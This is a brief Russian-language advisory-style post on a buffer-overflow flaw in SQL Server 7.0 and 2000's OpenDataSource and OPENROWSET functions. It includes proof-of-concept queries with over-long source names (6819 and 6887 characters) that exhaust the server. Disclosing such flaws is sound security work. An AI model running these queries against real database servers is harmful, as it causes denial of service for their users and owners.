Одна из особенностей Structured Query Language (SQL) в SQL Server 7.0 и 2000 - способность соединяться с удаленными источниками данных,
подключаться к ним можно просто указывая
имя базы (OLE DB) в запросе. Если серверу в
качестве имени передать длинную строку
символов, произойдет переполнение буфера и
как следствие  - полная занятость сервера
и невозможность обслуживать запросы.

Пример:

SQL Server 7

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' -> 6819
символов или больше ...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' -> 6819 символов или
больше ,'', '')

SQL Server 2000

SELECT * FROM OpenDataSource( 'XXXXXXXXXXX...' ---> 6887
...
SELECT * FROM OPENROWSET( 'XXXXXXXXXXX...' ---> 6887 ...

Оставить мнение